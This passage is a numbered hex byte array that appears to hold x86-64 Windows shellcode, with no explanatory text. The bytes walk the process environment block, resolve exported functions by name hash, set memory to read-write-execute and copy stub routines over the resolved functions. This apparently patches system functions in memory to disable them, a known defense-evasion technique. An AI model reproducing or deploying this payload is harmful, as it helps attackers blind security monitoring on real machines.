1020 0x4d, 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1021 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
1022 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1023 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1024 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1025 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80,
1026 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1027 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1028 0x28, 0x48, 0x8b, 0x40, 0x68, 0x8b, 0x55, 0x18, 0x89, 0xd1, 0xff, 0xd0,
1029 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
1030 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1031 0x89, 0x45, 0x20, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1032 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1033 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1034 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3,
1035 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1036 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x60,
1037 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
1038 0x89, 0x8d, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0xf8, 0x01, 0x00,
1039 0x00, 0x4c, 0x89, 0x85, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x8d, 0x08,
1040 0x02, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x00,
1041 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85,
1042 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x8b,
1043 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
1044 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b,
1045 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x88, 0x00, 0x00, 0x00, 0x48,
1046 0x89, 0x85, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00,
1047 0x00, 0x8b, 0x00, 0x89, 0x85, 0xb4, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xb4,
1048 0x01, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1049 0x9c, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xb4, 0x01, 0x00, 0x00, 0x48, 0x8b,
1050 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8,
1051 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40,
1052 0x18, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xd8, 0x01, 0x00,
1053 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x62, 0x03,
1054 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x1c,
1055 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1056 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01,
1057 0x00, 0x00, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01,
1058 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x01, 0x00, 0x00,
1059 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2,
1060 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1061 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00,
1062 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
1063 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x88, 0x01, 0x00, 0x00, 0xc7, 0x85,
1064 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x29, 0x8b, 0x95,
1065 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x01, 0x00, 0x00, 0x48,
1066 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x8b, 0x85,
1067 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x60, 0x83, 0x85, 0xdc, 0x01,
1068 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1069 0x88, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1070 0x75, 0xc0, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0x60,
1071 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x60,
1072 0x48, 0x89, 0xc1, 0xe8, 0x1d, 0x09, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80,
1073 0x01, 0x00, 0x00, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01,
1074 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1075 0x85, 0x98, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2,
1076 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1077 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00,
1078 0x48, 0x8b, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xce,
1079 0x08, 0x00, 0x00, 0x48, 0x33, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x3b,
1080 0x85, 0x00, 0x02, 0x00, 0x00, 0x0f, 0x85, 0xfc, 0x01, 0x00, 0x00, 0x8b,
1081 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d,
1082 0x14, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1083 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00,
1084 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1085 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48,
1086 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1087 0xd0, 0x01, 0x00, 0x00, 0x48, 0x3b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x0f,
1088 0x82, 0x99, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00, 0x00,
1089 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00,
1090 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x0f, 0x86,
1091 0x76, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
1092 0x89, 0x85, 0x70, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00,
1093 0x00, 0x00, 0x00, 0x00, 0xeb, 0x3b, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00,
1094 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
1095 0x10, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x20, 0x8b,
1096 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00,
1097 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x29, 0x83, 0x85,
1098 0xdc, 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48,
1099 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1100 0x84, 0xc0, 0x74, 0x0c, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x3b, 0x76,
1101 0xa5, 0xeb, 0x01, 0x90, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0,
1102 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x64, 0x8b, 0x85, 0xdc, 0x01,
1103 0x00, 0x00, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x6c,
1104 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, 0x03, 0x89, 0xc0, 0xc6,
1105 0x44, 0x05, 0x20, 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0,
1106 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x00, 0x8b, 0x85, 0xdc, 0x01,
1107 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x70, 0x01,
1108 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1109 0xeb, 0x24, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70,
1110 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85, 0xdc,
1111 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85, 0xdc, 0x01, 0x00,
1112 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70,
1113 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
1114 0x09, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x7e, 0x76, 0xbc, 0x8b, 0x85,
1115 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8b, 0x85,
1116 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8d, 0x55, 0x20,
1117 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00,
1118 0x48, 0x83, 0xbd, 0x68, 0x01, 0x00, 0x00, 0x00, 0x74, 0x21, 0x48, 0x8b,
1119 0x85, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8d, 0x55,
1120 0xa0, 0x48, 0x8b, 0x8d, 0x68, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
1121 0x85, 0xd0, 0x01, 0x00, 0x00, 0xeb, 0x0b, 0x48, 0xc7, 0x85, 0xd0, 0x01,
1122 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00,
1123 0x00, 0xeb, 0x25, 0x83, 0xad, 0xd8, 0x01, 0x00, 0x00, 0x01, 0x83, 0xbd,
1124 0xd8, 0x01, 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x83, 0xbd, 0xd0, 0x01,
1125 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8a, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x85,
1126 0xd0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x60, 0x02, 0x00, 0x00, 0x5d,
1127 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d,
1128 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0xc7, 0x45,
1129 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x60, 0x00, 0x00, 0x00,
1130 0x8b, 0x45, 0xdc, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48,
1131 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48,
1132 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe0, 0x48,
1133 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x31, 0x48, 0x8b, 0x45,
1134 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x4d, 0x20, 0x48, 0x8b, 0x55,
1135 0x18, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
1136 0x4d, 0x10, 0xe8, 0x50, 0xfb, 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48,
1137 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
1138 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x07, 0x48,
1139 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xbb, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
1140 0xc4, 0x50, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1141 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1142 0x48, 0x8b, 0x45, 0x38, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
1143 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1144 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x0f, 0xaf, 0x45, 0x18, 0x5d, 0xc3,
1145 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1146 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x30,
1147 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1148 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b,
1149 0x55, 0x10, 0x8b, 0x45, 0x18, 0x01, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1150 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45,
1151 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1152 0x38, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x45,
1153 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00,
1154 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1155 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xac, 0x03, 0x00,
1156 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48,
1157 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1158 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x46, 0xff, 0xff, 0xff, 0x48,
1159 0x8d, 0x05, 0x1a, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0,
1160 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x0a, 0xb8, 0x00,
1161 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
1162 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48,
1163 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
1164 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1165 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49,
1166 0x89, 0xd0, 0x48, 0x8d, 0x15, 0xc3, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1,
1167 0xe8, 0x27, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1168 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4,
1169 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1170 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xbc, 0x03, 0x00,
1171 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48,
1172 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1173 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xca, 0xfe, 0xff, 0xff, 0x48,
1174 0x8d, 0x05, 0x9e, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0,
1175 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x07, 0xb8, 0x00,
1176 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1177 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0,
1178 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85,
1179 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x37, 0x8b, 0x55,
1180 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x4d,
1181 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x79, 0x02, 0x00, 0x00, 0x48,
1182 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b,
1183 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0,
1184 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40, 0x5d, 0xc3, 0x55,
1185 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1186 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0xc7,
1187 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3,
1188 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, 0x45,
1189 0x10, 0x2b, 0x45, 0x18, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1190 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0xb8, 0x00,
1191 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1192 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x99, 0xf7, 0x7d, 0x18, 0x5d, 0xc3,
1193 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10,
1194 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10,
1195 0x48, 0x81, 0xc2, 0x4c, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0,
1196 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8,
1197 0x01, 0x00, 0x00, 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
1198 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1199 0x5c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89,
1200 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1201 0x00, 0x00, 0xe9, 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x7f, 0xff,
1202 0xff, 0xff, 0x48, 0x8d, 0x05, 0x61, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2,
1203 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79,
1204 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48,
1205 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d,
1206 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40,
1207 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1208 0x00, 0x00, 0xe9, 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b,
1209 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x0a, 0xff, 0xff, 0xff,
1210 0x48, 0x89, 0xc1, 0xe8, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
1211 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c,
1212 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45,
1213 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1214 0x7c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89,
1215 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1216 0x00, 0x00, 0xe9, 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xa2, 0xfe,
1217 0xff, 0xff, 0x48, 0x8d, 0x05, 0x76, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2,
1218 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79,
1219 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10,
1220 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48,
1221 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
1222 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb,
1223 0x37, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48,
1224 0x8d, 0x15, 0x25, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x00,
1225 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b,
1226 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d,
1227 0xf0, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40,
1228 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
1229 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c,
1230 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb,
1231 0x10, 0x8b, 0x45, 0x18, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10,
1232 0x48, 0x83, 0x45, 0xf8, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8d, 0x50,
1233 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0, 0x75, 0xdf, 0x48, 0x8b,
1234 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1235 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1236 0x4c, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
1237 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x17, 0x48, 0x8b,
1238 0x45, 0xf0, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, 0x48,
1239 0x83, 0x45, 0xf8, 0x01, 0x48, 0x83, 0x45, 0xf0, 0x01, 0x48, 0x8b, 0x45,
1240 0x20, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0,
1241 0x75, 0xd8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
1242 0x55, 0x56, 0x53, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x20, 0x48, 0x89,
1243 0x55, 0x28, 0x4c, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x5d, 0x20, 0x48, 0x8b,
1244 0x75, 0x28, 0xeb, 0x38, 0x48, 0x89, 0xd8, 0x48, 0x8d, 0x58, 0x01, 0x0f,
